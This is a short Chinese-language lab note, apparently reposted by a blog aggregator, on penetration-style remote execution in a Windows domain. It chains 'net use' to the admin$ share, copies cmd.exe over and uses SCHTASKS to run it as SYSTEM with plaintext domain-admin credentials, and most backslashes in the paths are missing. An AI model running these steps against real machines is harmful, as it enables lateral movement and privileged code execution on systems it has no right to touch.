最近工作中用到了SCHTASKS命令來遠程執(zhí)行命令，由于命令參數(shù)有點多，利用起來稍微有點復(fù)雜，把利用方法記錄在這里，備忘。

遠程執(zhí)行命令的模擬環(huán)境是我用VMware Workstation Pro搭建的一個簡單域環(huán)境，里面有一臺裝了Microsoft Windows Server 2008 R2 Enterprise系統(tǒng)的域控，一臺裝了Microsoft Windows 7的客戶機。要實現(xiàn)的功能是通過在Windows 7客戶機上利用SCHTASKS命令在域控上遠程執(zhí)行命令。

具體執(zhí)行的命令是讓域控運行從客戶機上拷貝過去的cmd.exe

下面是遠程執(zhí)行命令的具體步驟：

1. 建立IPC連接

net use \dom-08R2.test.comadmin$ "123456q!@#" /user:test.comAdministrator

2. 把要執(zhí)行的文件通過copy命令復(fù)制到目標(biāo)系統(tǒng)

copy c:windowssystem32cmd.exe \dom-08R2.test.comadmin$ empcmd111.exe

3. 確認(rèn)文件是否復(fù)制成功

dir \dom-08R2.test.comadmin$ empcmd111.exe

4. 刪除建立的IPC連接

net use \dom-08R2.test.comadmin$ /del

5. 用SCHTASKS命令在遠程系統(tǒng)建立計劃任務(wù)

以遠程系統(tǒng)的system用戶運行c:windows empcmd111.exe，計劃任務(wù)的名字為test1

SCHTASKS /Create /S dom-08R2.test.com /U test.comAdministrator /P "123456q!@#" /SC ONCE /ST 11:00 /TN test1 /TR c:windows empcmd111.exe /RU system

6. 查看建立的計劃任務(wù)是否正確

用到的命令是SCHTASKS /Query，但簡體中文版Windows 7 中直接執(zhí)行SCHTASKS /Query命令會報錯：“錯誤：無法加載資源。”，原因是簡體中文的 schtasks MUI 語言包有問題，導(dǎo)致 schtasks /query 不能輸出。 解決辦法是先輸入chcp 437，將當(dāng)前的命令提示符的代碼頁設(shè)置為美國英語。

chcp 437

SCHTASKS /Query /S dom-08R2.test.com /U test.comAdministrator /P "123456q!@#"

7. 運行建立的計劃任務(wù)

SCHTASKS /Run /S dom-08R2.test.com /U test.comAdministrator /P "123456q!@#" /I /TN "test1"

8. 去遠程系統(tǒng)確認(rèn)cmd111.exe是否已經(jīng)運行（通過看進程）

9. 刪除建立的計劃任務(wù)

SCHTASKS /Delete /S dom-08R2.test.com /U test.comAdministrator /P "123456q!@#" /TN "test1" /F

總結(jié)

以上是生活随笔為你收集整理的Windows渗透：利用schtasks远程执行命令的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。